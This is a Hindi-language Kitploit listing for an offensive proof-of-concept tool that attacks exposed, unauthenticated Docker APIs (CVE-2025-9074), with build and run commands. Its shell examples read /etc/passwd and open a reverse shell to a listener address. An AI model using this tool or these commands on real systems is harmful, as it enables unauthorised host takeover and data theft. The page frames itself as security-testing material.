Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
poc-2025-9074 — Docker API CVE-2025-9074 PoC (प्रमाण-अवधारणा). CVE-2025-9074 के लिए एक उन्नत शोषण ढाँचा, जो अप्रमाणित Docker API एंडपॉइंट्स को लक्षित करता है और इसमें एक एकीकृत इंटरैक्टिव कमांड शेल शामिल है। | Kitploit
उपकरण/GitHubGitHub/xwpdx0/poc-2025-9074
क्लाउड इन्फ्रास्ट्रक्चर सुरक्षाविशेषाधिकार वृद्धिभेद्यता स्कैनरकंटेनर सुरक्षाशोषण फ्रेमवर्कशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubxwpdx0/poc-2025-9074
4119 महीने पहलेअभी तक समीक्षित नहीं

poc-2025-9074

Docker API CVE-2025-9074 PoC (प्रमाण-अवधारणा). CVE-2025-9074 के लिए एक उन्नत शोषण ढाँचा, जो अप्रमाणित Docker API एंडपॉइंट्स को लक्षित करता है और इसमें एक एकीकृत इंटरैक्टिव कमांड शेल शामिल है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-9074 | Docker API CVE-2025-9074 PoC (प्रूफ-ऑफ-कॉन्सेप्ट)

CVE-2025-9074 के लिए एक उन्नत शोषण फ्रेमवर्क, जो एकीकृत इंटरैक्टिव कमांड शेल के साथ अप्रमाणित Docker API एंडपॉइंट्स को लक्षित करता है।

Language Platform License

अवलोकन

यह टूल बिना प्रमाणीकरण के उजागर Docker API इंस्टेंस के शोषण को स्वचालित करता है, जिससे लक्ष्य होस्ट पर पूर्ण कंटेनर निर्माण और कमांड निष्पादन संभव होता है। टूल में सहज पोस्ट-एक्सप्लॉइटेशन संचालन के लिए एक कस्टम इंटरैक्टिव शेल शामिल है।

नोट: यह एक कस्टम PoC कार्यान्वयन है। मैंने CVE-2025-9074 की खोज नहीं की।

प्रदर्शन

प्रारंभिक शोषण

Exploitation Process

स्वचालित भेद्यता पहचान, इमेज पुलिंग, कंटेनर निर्माण और आरंभीकरण

इंटरैक्टिव कमांड निष्पादन

Command Execution

कमांड निष्पादन क्षमताओं वाला पोस्ट-एक्सप्लॉइटेशन शेल

मुख्य क्षमताएँ

  • स्वचालित Docker API भेद्यता स्कैनिंग
  • होस्ट फाइलसिस्टम माउंटिंग के साथ कंटेनर परिनियोजन
  • इंटरैक्टिव पोस्ट-एक्सप्लॉइटेशन शेल
  • रिमोट कमांड निष्पादन इंटरफ़ेस
  • रिवर्स शेल परिनियोजन मॉड्यूल
  • बेहतर दृश्यता के लिए रंगीन टर्मिनल आउटपुट

स्थापना

  1. रिपॉजिटरी को क्लोन करें
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. कोड को संकलित करें
root@kitploit:~
gcc poc.c -o poc-2025-9074

या आप रिलीज़ से बाइनरी डाउनलोड कर सकते हैं।

उपयोग

root@kitploit:~
./poc-2025-9074

डिफ़ॉल्ट लक्ष्य

डिफ़ॉल्ट लक्ष्य (127.0.0.1:2375) के विरुद्ध निष्पादित करें:

root@kitploit:~
./poc-2025-9074

कस्टम लक्ष्य

एक कस्टम Docker API एंडपॉइंट निर्दिष्ट करें:

Custom Target

इंटरैक्टिव शेल

सफल शोषण पर, एक इंटरैक्टिव शेल निम्नलिखित कमांड प्रदान करता है:

कमांडविवरण
cmd <command>कंटेनर के भीतर मनमाने कमांड निष्पादित करें
revshell <ip> <port>निर्दिष्ट लिसनर पर रिवर्स शेल तैनात करें
infoवर्तमान कंटेनर और लक्ष्य जानकारी प्रदर्शित करें
exitइंटरैक्टिव सत्र समाप्त करें

उपयोग उदाहरण

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

भेद्यता विवरण

CVE-2025-9074 उन Docker इंस्टेंस को प्रभावित करता है जिनमें उचित प्रमाणीकरण तंत्र के बिना API एंडपॉइंट उजागर होते हैं। यह गलत कॉन्फ़िगरेशन Docker डेमॉन तक अनधिकृत पहुँच की अनुमति देता है, जिससे निम्नलिखित संभव होता है:

  • मनमाना कंटेनर निर्माण
  • बाइंड माउंट के माध्यम से होस्ट फाइलसिस्टम तक पहुँच
  • विशेषाधिकार वृद्धि के अवसर
  • रिमोट कोड निष्पादन

कानूनी अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन सिस्टम्स पर उपयोग करें जिनके आप मालिक हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टम्स तक अनधिकृत पहुँच अवैध है और कानून द्वारा दंडनीय है
  • लेखक इस टूल के दुरुपयोग या इससे होने वाली क्षति के लिए कोई दायित्व नहीं लेता
  • उपयोगकर्ता लागू कानूनों और विनियमों के अनुपालन के लिए पूरी तरह जिम्मेदार हैं

लेखक

xwpd (@xwpdx0)

लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें


जिम्मेदार प्रकटीकरण और सुरक्षा अनुसंधान उद्देश्यों के लिए ही।

टूल डाउनलोड करें